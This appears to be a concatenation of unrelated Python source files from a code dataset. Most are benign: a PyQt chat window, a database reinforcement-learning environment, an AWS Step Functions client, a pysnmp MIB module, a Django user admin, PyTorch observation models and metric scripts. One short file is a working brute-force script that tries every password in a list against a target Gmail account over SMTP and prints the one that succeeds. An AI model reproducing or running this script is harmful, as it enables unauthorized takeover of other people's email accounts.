no_input = self.convTab.currentWidget().toPlainText()
if not no_input:
self._close_current_tab()
else:
msg = "Pressing the ESC key will close this conversation. <br />" \
"Are you sure you want to continue ?"
if popup_confirm(self, msg):
self._close_current_tab()
elif is_send_msg:
widget = self.convTab.currentWidget()
if not widget:
return
msg = widget.toPlainText()
if not msg:
return
widget.clear()
print 'send'
elif is_switch_tab:
count = self.convTab.count()
k = key.real - CHAR_START_AT
if 1 > k and k > 9:
return
if k < count + 1:
self.convTab.setCurrentIndex(k - 1)
elif is_goto_prev_tab:
count = self.convTab.count()
cur_idx = self.convTab.currentIndex()
if count == 1:
return
elif cur_idx == 0:
self.convTab.setCurrentIndex(count - 1)
else:
self.convTab.setCurrentIndex(cur_idx - 1)
elif is_goto_next_tab:
count = self.convTab.count()
cur_idx = self.convTab.currentIndex()
if count == 1:
return
elif (count - 1) == cur_idx:
self.convTab.setCurrentIndex(0)
else:
self.convTab.setCurrentIndex(cur_idx + 1)
class Main(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self, parent = None)
x, y, w, h = 500, 200, 300, 400
self.setGeometry(x, y, w, h)
self.chat_win = ChatWindow()
self.chat_win.show()
self.btn = QtGui.QPushButton(self)
self.btn.clicked.connect(self.show_tab)
self.add_btn = QtGui.QPushButton('add', self)
self.add_btn.clicked.connect(self.add_tab)
self.del_btn = QtGui.QPushButton('del', self)
self.del_btn.clicked.connect(self.del_tab)
qh = QtGui.QHBoxLayout()
qh.addWidget(self.btn)
qh.addWidget(self.add_btn)
qh.addWidget(self.del_btn)
self.setLayout(qh)
self.show()
self.c = 1
def add_tab(self):
self.chat_win.add_tab(str(self.c))
self.c += 1
def del_tab(self):
pass
def show_tab(self):
self.chat_win.show()
def main():
app = QtGui.QApplication(sys.argv)
main = Main()
sys.exit(app.exec_())
if __name__ == "__main__":
main()
| StarcoderdataPython |
4918838 | <reponame>simplerick/sqlopt
import numpy as np
from gym.spaces import Box, Dict, Discrete
from database_env.foop import DataBaseEnv_FOOP
from database_env.query_encoding import DataBaseEnv_QueryEncoding
class DataBaseEnv_FOOP_QueryEncoding(DataBaseEnv_FOOP, DataBaseEnv_QueryEncoding):
"""
Database environment with states and actions as in the article (https://arxiv.org/pdf/1911.11689.pdf)
and encoding like NEO (http://www.vldb.org/pvldb/vol12/p1705-marcus.pdf).
Suitable for use with RLlib.
Attributes:
env_config(dict): Algorithm-specific configuration data, should contain item corresponding to the DB scheme.
"""
def __init__(self, env_config, is_join_graph_encoding=False):
super().__init__(env_config)
self.is_join_graph_encoding = is_join_graph_encoding
real_obs_shape = self.N_rels * self.N_cols + self.N_cols
if self.is_join_graph_encoding:
real_obs_shape += self.query_encoding_size
real_obs_shape = (real_obs_shape, )
self.observation_space = Dict({
'real_obs': Box(low = 0, high = 1, shape = real_obs_shape, dtype = np.int),
'action_mask': Box(low = 0, high = 1, shape = (len(self.actions), ), dtype = np.int),
})
def get_obs(self):
real_obs = [self.get_foop().flatten()]
if self.is_join_graph_encoding:
real_obs.append(self.join_graph_encoding)
real_obs.append(self.predicate_ohe)
real_obs = np.concatenate(real_obs).astype(np.int)
return {
'real_obs': real_obs.tolist(),
'action_mask': self.valid_actions().astype(np.int).tolist()
}
| StarcoderdataPython |
3490074 | <reponame>NarrativeScience/sfn-workflow-client
"""Contains a client for interacting with a workflow"""
import boto3
from .config import AWS_ACCOUNT_ID, STEPFUNCTIONS_ENDPOINT_URL
from .execution import ExecutionCollection
class Workflow:
"""Client wrapper around boto3's Step Functions interface.
This class is mostly a conduit for working with executions. Common interactions
include::
# Initialize a workflow client
workflow = Workflow("my-state-machine")
# Fetch all executions
collection = await workflow.executions.fetch()
# Fetch currently running executions
collection = await workflow.executions.fetch(status=ExecutionStatus.running)
# Start a new execution
execution = await workflow.executions.create().start()
# Start a new execution and wait until it completes (useful for tests)
execution = await workflow.executions.start_sync()
# Find an execution by trace ID (for tests)
execution = await workflow.executions.fetch().find_by_trace_id("abc")
# Fetch the event history of an execution
events = await execution.events.fetch()
"""
def __init__(
self, name: str, stepfunctions_endpoint_url: str = STEPFUNCTIONS_ENDPOINT_URL
) -> None:
"""
Args:
name: Workflow (state machine) name to be used to query AWS Step Functions
stepfunctions_endpoint_url: URL for making requests to the Step Functions API
"""
self.name = name
self.stepfunctions = boto3.client(
"stepfunctions", endpoint_url=stepfunctions_endpoint_url
)
self.executions = ExecutionCollection([self])
self.state_machine_arn = (
f"arn:aws:states:{self.stepfunctions.meta.region_name}:{AWS_ACCOUNT_ID}"
f":stateMachine:{self.name}"
)
| StarcoderdataPython |
3230212 | <filename>mods/LA/demo.py
#
from common import *
from mods.LA.raanes2015 import step, X0
from mods.Lorenz95.demo import amplitude_animation
##
simulator = make_recursive(step, prog="Simulating")
x0 = X0.sample(1).squeeze()
xx = simulator(x0, k=500, t=0, dt=1)
##
amplitude_animation(xx,periodic=True,skip=3)
##
| StarcoderdataPython |
6582773 | <gh_stars>10-100
#
# PySNMP MIB module IB-TC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IB-TC-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:22:51 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, Gauge32, Bits, Counter64, IpAddress, iso, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, NotificationType, Counter32, Integer32, Unsigned32, TimeTicks, experimental, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "Gauge32", "Bits", "Counter64", "IpAddress", "iso", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "NotificationType", "Counter32", "Integer32", "Unsigned32", "TimeTicks", "experimental", "MibIdentifier")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
ibTcMIB = ModuleIdentity((1, 3, 6, 1, 3, 117, 1))
ibTcMIB.setRevisions(('2006-06-27 00:00',))
if mibBuilder.loadTexts: ibTcMIB.setLastUpdated('200606270000Z')
if mibBuilder.loadTexts: ibTcMIB.setOrganization('IETF IP over IB (IPOIB) Working Group')
infinibandMIB = MibIdentifier((1, 3, 6, 1, 3, 117))
class IbPort(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches and (C18-14.a1) for switch port 0, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
status = 'current'
displayHint = 'd'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 254)
class IbPhysPort(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
status = 'current'
displayHint = 'd'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 254)
class IbPhysPortAndInvalid(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
status = 'current'
displayHint = 'd'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 255)
class IbDataPort(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
status = 'deprecated'
displayHint = 'd'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 254)
class IbDataPortAndInvalid(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
status = 'deprecated'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(1, 255)
class IbVirtualLane(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 3.5.7.'
status = 'current'
displayHint = 'd'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 15)
class IbDataVirtualLane(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 3.5.7.'
status = 'current'
displayHint = 'd'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 14)
class IbDlid(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 4.1.3.'
status = 'current'
displayHint = 'd'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 65535)
class IbUnicastLid(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 4.1.3.'
status = 'current'
displayHint = 'd'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 49151)
class IbMulticastLid(TextualConvention, Unsigned32):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 4.1.3.'
status = 'current'
displayHint = 'd'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(49152, 65535)
class IbGuid(TextualConvention, OctetString):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 4.1.'
status = 'current'
displayHint = '1x:'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(8, 8)
fixedLength = 8
class IbSmaPortList(TextualConvention, OctetString):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 172.16.17.32 (C18-10.a1) for switches and (C18-14.a1) for switch port 0, Section 172.16.31.10 (C17-7.a1) for Channel Adapters, and Section 192.168.127.12 for routers.'
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(32, 32)
fixedLength = 32
class IbSmPortList(TextualConvention, OctetString):
reference = 'InfiniBand Architecture Release 1.2 Vol. 1. [IBTAARCH] Section 18.2.4.1 (C18-10.a1) for switches, Section 17.2.1.3 (C17-7.a1) for Channel Adapters, and Section 19.2.4.2 for routers.'
status = 'deprecated'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(32, 32)
fixedLength = 32
class IbIpoibClientIdentifier(TextualConvention, OctetString):
status = 'current'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(20, 20)
fixedLength = 20
class IbSmSubnetPrefix(TextualConvention, OctetString):
status = 'current'
displayHint = '2x:'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(8, 8)
fixedLength = 8
class IbSmState(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))
namedValues = NamedValues(("notActive", 0), ("discovering", 1), ("standby", 2), ("master", 3))
class IbNodeType(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))
namedValues = NamedValues(("unknown", 0), ("channelAdapter", 1), ("switch", 2), ("router", 3))
class IbMtu(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("mtu256", 1), ("mtu512", 2), ("mtu1024", 3), ("mtu2048", 4), ("mtu4096", 5))
class IbPartitionKey(TextualConvention, Unsigned32):
status = 'current'
displayHint = 'x'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 65535)
class IbPartition(TextualConvention, Unsigned32):
status = 'current'
displayHint = 'x'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 32767)
class IbTransportTime(TextualConvention, Unsigned32):
status = 'current'
subtypeSpec = Unsigned32.subtypeSpec + ValueRangeConstraint(0, 31)
mibBuilder.exportSymbols("IB-TC-MIB", IbSmSubnetPrefix=IbSmSubnetPrefix, IbPhysPort=IbPhysPort, IbTransportTime=IbTransportTime, IbIpoibClientIdentifier=IbIpoibClientIdentifier, IbUnicastLid=IbUnicastLid, IbSmPortList=IbSmPortList, IbMulticastLid=IbMulticastLid, ibTcMIB=ibTcMIB, IbSmState=IbSmState, PYSNMP_MODULE_ID=ibTcMIB, IbDlid=IbDlid, IbGuid=IbGuid, IbPort=IbPort, IbDataPort=IbDataPort, IbDataPortAndInvalid=IbDataPortAndInvalid, IbVirtualLane=IbVirtualLane, IbNodeType=IbNodeType, IbMtu=IbMtu, infinibandMIB=infinibandMIB, IbDataVirtualLane=IbDataVirtualLane, IbPartition=IbPartition, IbPhysPortAndInvalid=IbPhysPortAndInvalid, IbSmaPortList=IbSmaPortList, IbPartitionKey=IbPartitionKey)
| StarcoderdataPython |
9710086 | <gh_stars>10-100
BASE_URL = "https://raw.communitydragon.org/"
def strip_k(string: str) -> str:
'''Strips char k if string start with k'''
if string is None: return string
return string[1:] if string[0] == "k" else string
def abs_url(link: str, version="latest") -> str:
'''Return the CDragon url for the given game asset url'''
if link is None: return link
link = link.lower()
splited = link.split("/lol-game-data/assets/")
if len(splited) == 2:
return BASE_URL + version + "/plugins/rcp-be-lol-game-data/global/default/" + splited[1]
return BASE_URL + version + "/plugins/rcp-be-lol-game-data/global/default/" + link
def sanitize(string: str) -> str:
'''Sanitize CDragon descriptions'''
if string is None: return string
new_string = ""
is_tag = False
is_at = False
tag = ""
for s in string:
if not is_tag and not is_at and s not in "<>@": new_string += s
if s == "<": is_tag = True
elif s == ">":
is_tag = False
if tag == "br" and len(new_string) > 0 and new_string[-1] != " ": new_string += "\n"
tag = ""
elif s == "@" and not is_at:
is_at = True
new_string += "(?)"
elif s == "@": is_at = False
if is_tag and s not in "<>": tag += s
return new_string
| StarcoderdataPython |
9618156 | import pytest
import numpy as np
from needlestack.apis import indices_pb2
@pytest.mark.parametrize(
"X,k",
[
(np.array([[1, 1, 1]]), 1),
(np.array([[1, 1, 1]]), 5),
(np.array([[1, 1, 1]]), 1000000),
],
)
def test_query(shard_3d, X, k):
shard_3d.load()
results = shard_3d.query(X, k)
assert isinstance(results, list)
assert len(results) == min(k, shard_3d.index.count)
for item in results:
if item.WhichOneof("distance") in ("float32", "float16"):
assert item.float_distance >= 0.0
else:
assert item.double_distance >= 0.0
assert isinstance(item.metadata, indices_pb2.Metadata)
@pytest.mark.parametrize("id", ["test_index-0", "doesnt exists"])
def test_retrieve(shard_3d, id):
shard_3d.enable_id_to_vector = True
shard_3d.load()
item = shard_3d.retrieve(id)
# index = shard_3d.index._get_index_by_id(id)
assert isinstance(item, indices_pb2.RetrievalResultItem)
| StarcoderdataPython |
104188 | from django.contrib import admin
from django import forms
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from profiles.models import FavoritesProducts, Address
from accounts.models import User
from products.models import Product
from carts.models import Cart
from orders.models import Order
from django.contrib import messages
from django.shortcuts import redirect
from .models import User
class UserCreationForm(forms.ModelForm):
password1 = forms.CharField(label='Password', widget=forms.PasswordInput)
password2 = forms.CharField(
label="Password confirmation",
widget=forms.PasswordInput
)
class Meta:
model = User
fields = ('phone_number',)
def clean_password2(self):
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords don't match")
return password2
def save(self, commit=True):
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserChangeForm(forms.ModelForm):
password = ReadOnlyPasswordHashField()
class Meta:
model = User
fields = '__all__'
def clean_password(self):
return self.initial["password"]
class UserAdmin(BaseUserAdmin):
form = UserChangeForm
add_form = UserCreationForm
list_display = ('id', 'phone_number', 'email', 'full_name')
list_display_links = ('id', 'phone_number')
list_filter = ('user_type',)
readonly_fields = ('id', 'phone_number', 'email', 'full_name')
fieldsets = (
(None, {'fields': ('phone_number', 'password')}),
('Personal info', {'fields': ('email', 'first_name', 'last_name', 'national_code')}),
('Permissions', {'fields': ('is_admin',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('phone_number', '<PASSWORD>', '<PASSWORD>')}
),
)
search_fields = ('email', 'first_name', 'last_name', 'phone_number')
ordering = ('phone_number',)
filter_horizontal = ()
def has_add_permission(self, request):
return False
# def has_delete_permission(self, request, obj=None):
# return False
def changeform_view(self, request, object_id=None, form_url='', extra_context=None):
extra_context = extra_context or {}
extra_context['show_save_and_continue'] = False
extra_context['show_save'] = False
return super(UserAdmin, self).changeform_view(request, object_id, extra_context=extra_context)
def has_delete_permission(self, request, obj=id):
return True
def delete_view(self, request, object_id, form_url='', extra_context=None):
user = User.objects.get(id=object_id)
if(user.user_type=='Admin'):
messages.error(request, 'Admin cannot be deleted')
return redirect('/admin/accounts/user/')
address = Address.objects.filter(user=user).all()
fav = FavoritesProducts.objects.filter(user=user).all()
prod = Product.objects.filter(user=user).all()
carts = Cart.objects.filter(user=user).all()
orders = Order.objects.filter(user=user).all()
for add in address:
add.delete()
for pro in fav:
pro.delete()
for order in orders:
order.delete()
for cart in carts:
cart.delete()
for pro in prod:
pro.delete()
user.delete()
messages.add_message(request, messages.INFO, 'User deleted')
return redirect('/admin/accounts/user/')
admin.site.register(User, UserAdmin)
admin.site.unregister(Group)
admin.site.site_url="/admin/" | StarcoderdataPython |
132827 | import torch
import torch.nn as nn
from ltprg.model.seq import sort_seq_tensors, unsort_seq_tensors, SequenceModel
from torch.autograd import Variable
class ObservationModel(nn.Module):
def __init__(self):
super(ObservationModel, self).__init__()
def forward(self, observation):
""" Computes batch of transformed observations """
pass
def on_gpu(self):
return next(self.parameters()).is_cuda
def save(self, model_path):
init_params = self._get_init_params()
model_obj = dict()
model_obj["init_params"] = init_params
model_obj["state_dict"] = self.state_dict()
model_obj["obs_type"] = type(self).__name__
torch.save(model_obj, model_path)
@staticmethod
def load(model_path):
model_obj = torch.load(model_path)
init_params = model_obj["init_params"]
state_dict = model_obj["state_dict"]
obs_type = model_obj["obs_type"]
model = None
if obs_type == "ObservationModelIndexedSequential":
model = ObservationModelIndexedSequential.make(init_params)
elif obs_type =="ObservationModelReorderedSequential":
model = ObservationModelReorderedSequential.make(init_params)
model.load_state_dict(state_dict)
return model
class ObservationModelIndexed(ObservationModel):
def __init__(self, indexed_obs_size, num_indices):
super(ObservationModelIndexed, self).__init__()
self._indexed_obs_size = indexed_obs_size
self._num_indices = num_indices
# observations: batch x input observation
# indices (one-hots): batch x (num_indices) x (num_indices)
# return batch x num_indices x indexd_obs_size
def _forward_for_indices(self, observation, indices):
"""
Computes batch of transformed observations from input observations
and indexed index indicators
"""
pass
def forward(self, observation):
indices = torch.eye(self._num_indices).unsqueeze(0).expand(observation[0].size(0), self._num_indices, self._num_indices)
if self.on_gpu():
device = 0
if isinstance(observation, tuple):
device = observation[0].get_device()
else:
device = observation.get_device()
indices = indices.cuda(device)
indices = Variable(indices, requires_grad=False)
transformed = self._forward_for_indices(observation, indices)
transformed = torch.cat((transformed, indices), 2)
return transformed.view(indices.size(0), self._num_indices*(self._num_indices+self._indexed_obs_size))
class ObservationModelIndexedSequential(ObservationModelIndexed):
def __init__(self, indexed_obs_size, num_indices, seq_model):
super(ObservationModelIndexedSequential, self).__init__(indexed_obs_size, num_indices)
self._init_params = dict()
self._init_params["indexed_obs_size"] = indexed_obs_size
self._init_params["num_indices"] = num_indices
self._init_params["arch_type"] = type(seq_model).__name__
self._init_params["seq_model"] = seq_model._get_init_params()
self._seq_model = seq_model
self._decoder = nn.Linear(seq_model.get_hidden_size()*seq_model.get_directions(), indexed_obs_size)
self._decoder_nl = nn.Tanh()
def _get_init_params(self):
return self._init_params
@staticmethod
def make(init_params):
indexed_obs_size = init_params["indexed_obs_size"]
num_indices = init_hidden["num_indices"]
seq_model = SequenceModel.make(init_params["seq_model"], init_params["arch_type"])
return ObservationModelIndexedSequential(indexed_obs_size, num_indices, seq_model)
def get_seq_model(self):
return self._seq_model
# observations: batch x input observation
# indices (one-hots): batch x (num_indices) x (num_indices)
# return batch x num_indices x indexed_obs_size
def _forward_for_indices(self, observation, indices):
num_indices = indices.size(2)
batch_size = indices.size(0)
max_len = observation[0].size(1)
seq = observation[0].transpose(0,1) # After transpose: Length x batch
seq_length = observation[1] # Batch
# length, indices*batch
if len(seq.size()) == 2:
seq = seq.unsqueeze(1).expand(max_len, num_indices, batch_size).contiguous().view(-1, num_indices*batch_size)
else:
seq = seq.unsqueeze(1).expand(max_len, num_indices, batch_size, seq.size(2)).contiguous().view(-1, num_indices*batch_size, seq.size(2)).float()
seq_length = seq_length.unsqueeze(1).expand(batch_size, num_indices).contiguous().view(-1, num_indices*batch_size).squeeze()
indices = indices.contiguous().view(-1, num_indices)
sorted_seq, sorted_length, sorted_inputs, sorted_indices = sort_seq_tensors(seq, seq_length, inputs=[indices], on_gpu=self.on_gpu())
output, hidden = self._seq_model(seq_part=sorted_seq, seq_length=sorted_length, input=sorted_inputs[0])
if isinstance(hidden, tuple): # Handle LSTM
hidden = hidden[0]
decoded = self._decoder(hidden.transpose(0,1).contiguous().view(-1, hidden.size(0)*hidden.size(2)))
output = self._decoder_nl(decoded)
unsorted_output = unsort_seq_tensors(sorted_indices, [output])[0]
unsorted_output = unsorted_output.view(batch_size, num_indices, self._indexed_obs_size)
return unsorted_output
class ObservationModelReordered(ObservationModel):
def __init__(self, indexed_obs_size, num_indices):
super(ObservationModelReordered, self).__init__()
self._indexed_obs_size = indexed_obs_size
self._num_indices = num_indices
# observations: batch x input observation
# indices (one-hots): batch x num_indices
# return batch x num_indices x indexed_obs_size
def _forward_for_indices(self, observation, indices):
"""
Computes batch of transformed observations from input observations
and indexed index indicators
"""
pass
def forward(self, observation):
indices = torch.arange(0, self._num_indices).unsqueeze(0).expand(observation[0].size(0), self._num_indices).long()
if self.on_gpu():
device = 0
if isinstance(observation, tuple):
device = observation[0].get_device()
else:
device = observation.get_device()
indices = indices.cuda(device)
indices = Variable(indices, requires_grad=False)
transformed = self._forward_for_indices(observation, indices)
return transformed.view(indices.size(0), self._num_indices*self._indexed_obs_size)
class ObservationModelReorderedSequential(ObservationModelReordered):
def __init__(self, indexed_obs_size, num_indices, seq_model):
super(ObservationModelReorderedSequential, self).__init__(indexed_obs_size, num_indices)
self._init_params = dict()
self._init_params["indexed_obs_size"] = indexed_obs_size
self._init_params["num_indices"] = num_indices
self._init_params["arch_type"] = type(seq_model).__name__
self._init_params["seq_model"] = seq_model._get_init_params()
self._seq_model = seq_model
if indexed_obs_size != seq_model.get_hidden_size()*seq_model.get_directions():
raise ValueError("indxed_obs_size must be the same as the seq_model hidden size")
def _get_init_params(self):
return self._init_params
@staticmethod
def make(init_params):
indexed_obs_size = init_params["indexed_obs_size"]
num_indices = init_hidden["num_indices"]
seq_model = SequenceModel.make(init_params["seq_model"], init_params["arch_type"])
return ObservationModelReorderedSequential(indexed_obs_size, num_indices, seq_model)
def get_seq_model(self):
return self._seq_model
# observations: batch x input observation
# indices (one-hots): batch x num_indices
# return batch x num_indices x indexed_obs_size
def _forward_for_indices(self, observation, indices):
num_indices = indices.size(1)
batch_size = indices.size(0)
max_len = observation[0].size(1)
obj_size = observation[0].size(2)
reordered_obs = self._make_obs_reorderings(indices, observation)
seq = reordered_obs[0].view(batch_size*num_indices, max_len, obj_size).transpose(0,1).float()
seq_length = reordered_obs[1].contiguous().view(batch_size*num_indices)
sorted_seq, sorted_length, sorted_indices = sort_seq_tensors(seq, seq_length, inputs=None, on_gpu=self.on_gpu())
output, hidden = self._seq_model(seq_part=sorted_seq, seq_length=sorted_length, input=None)
if isinstance(hidden, tuple): # Handle LSTM
hidden = hidden[0]
output = hidden.transpose(0,1).contiguous().view(-1, hidden.size(0)*hidden.size(2))
unsorted_output = unsort_seq_tensors(sorted_indices, [output])[0]
unsorted_output = unsorted_output.view(batch_size, num_indices, self._indexed_obs_size)
return unsorted_output
# observation: batch x length x obj size
# indices: batch x num_indices
# return: batch x num_indices x length x obj size (reorderings)
def _make_obs_reorderings(self, indices, observation):
batch_size = observation[0].size(0)
num_indices = indices.size(1)
max_len = observation[0].size(1)
obj_size = observation[0].size(2)
seq_len = observation[1]
indexed_objs = self._get_indexed_obs_obj(indices, observation)
last_objs = self._get_last_obs_obj(num_indices, observation)
seq = observation[0].unsqueeze(1).expand(batch_size, num_indices, max_len, obj_size).contiguous().view(batch_size*num_indices*max_len, obj_size)
seq_clone = seq.clone()
offset = Variable(torch.arange(0,batch_size*num_indices).long(), requires_grad=False)*max_len
last_indices = Variable(torch.ones(batch_size, num_indices).long()*(observation[1].unsqueeze(1).expand(batch_size,num_indices)-1), requires_grad=False).view(batch_size*num_indices)
if self.on_gpu():
device = observation[0].get_device()
offset = offset.cuda(device)
last_indices = last_indices.cuda(device)
offset_indices = offset+indices.view(batch_size*num_indices)
offset_last_indices = offset + last_indices
seq_clone[offset_indices] = last_objs.view(batch_size*num_indices, obj_size)
seq_clone[offset_last_indices] = indexed_objs.view(batch_size*num_indices, obj_size)
seq_clone = seq_clone.view(batch_size, num_indices, max_len, obj_size)
seq_len = seq_len.unsqueeze(1).expand(batch_size, num_indices)
#print "seq", seq_clone[0]
#print "obs", observation[0][0]
#print "last", last_objs[0]
#print "indexed", indexed_objs[0]
return (seq_clone, seq_len)
# observation: batch x length x obj size
# indices: batch x num_indices
# return: batch x num_indices x obj size, num_indices*batch_size (indices)
def _get_indexed_obs_obj(self, indices, observation):
batch_size = observation[0].size(0)
seq_length = observation[0].size(1)
obj_size = observation[0].size(2)
num_indices = indices.size(1)
offset = Variable(torch.arange(0,batch_size).unsqueeze(0).expand(num_indices, batch_size).transpose(0,1).contiguous().view(num_indices*batch_size).long(), requires_grad=False)*num_indices
if self.on_gpu():
device = observation[0].get_device()
offset = offset.cuda(device)
offset_indices = offset+indices.view(batch_size*num_indices)
indexed_obs = observation[0].contiguous().view(batch_size*seq_length, obj_size)[offset_indices]
return indexed_obs.view(batch_size, num_indices, obj_size)
# observation: batch x length x obj size
# return: batch x num_indices x obj size, num_indices*batch_size (indices)
def _get_last_obs_obj(self, num_indices, observation):
batch_size = observation[0].size(0)
indices = Variable(torch.ones(batch_size, num_indices).long()*(observation[1].unsqueeze(1).expand(batch_size,num_indices)-1), requires_grad=False)
if self.on_gpu():
device = observation[0].get_device()
indices = indices.cuda(device)
return self._get_indexed_obs_obj(indices, observation)
| StarcoderdataPython |
6496630 | <filename>k_means.py<gh_stars>0
import pandas as pd
from sklearn.cluster import MiniBatchKMeans
from sklearn.cluster import KMeans
if __name__ == '__main__':
df_candies = pd.read_csv('./data/raw/candy.csv')
x = df_candies.drop('competitorname', axis=1)
mini_kmeans = MiniBatchKMeans(n_clusters=4, batch_size=8).fit(x)
mini_kmeans_pred = mini_kmeans.predict(x)
print(mini_kmeans_pred)
kmeans = KMeans(n_clusters=4).fit(x)
kmeans_pred = kmeans.predict(x)
print(kmeans_pred)
compare = [1 if mini_kmeans_pred[i] == kmeans_pred[i] else 0 for i in range(0,len(x))]
print(compare) | StarcoderdataPython |
8163208 | import smtplib
file=open("password.txt","r")
target_gmail=input("ENTER THE TARGET EMAIL:")
def brut():
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(target_gmail, line)
print("THE PASSWORD IS\n", line)
g=0
for line in file:
if g==1:
break
else:
try:
brut()
break
except smtplib.SMTPAuthenticationError:
print(line,"Wrong")
| StarcoderdataPython |
4910532 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 13 12:32:57 2019
@author: ghosh128
"""
import sys
sys.path.append("../")
import os
import numpy as np
import config
from scipy import io
from sklearn.metrics import mean_squared_error
from math import sqrt
#%%
print("LOAD DATA")
test_data = np.load(os.path.join(config.NUMPY_DIR, "data_weak_6.npy"))
preds = io.loadmat(os.path.join(config.RESULT_DIR, "IMBALANCED", "COREG", "Y.mat"))["y"]
labels = np.reshape(test_data[:, -2], [-1, 1])
k_RMSE = np.zeros((1,3))
for k in range(1,len(labels),10):
indices = np.argsort(preds[:,0])[::-1]
pred_top_k_rmse = sqrt(mean_squared_error(labels[indices[:k],0], preds[indices[:k],0]))
print("Top K Root Mean Squared Error(Pred):", pred_top_k_rmse)
indices = np.argsort(labels[:,0])[::-1]
true_top_k_rmse = sqrt(mean_squared_error(labels[indices[:k],0], preds[indices[:k],0]))
print("Top K Root Mean Squared Error(True):", true_top_k_rmse)
GM_top_k_rmse = sqrt(pred_top_k_rmse*true_top_k_rmse)
print("Top K Root Mean Squared Error(GM):", GM_top_k_rmse)
k_RMSE = np.vstack((k_RMSE, np.reshape(np.array([pred_top_k_rmse, true_top_k_rmse, GM_top_k_rmse]), (1,-1))))
k_RMSE = k_RMSE[1:,:]
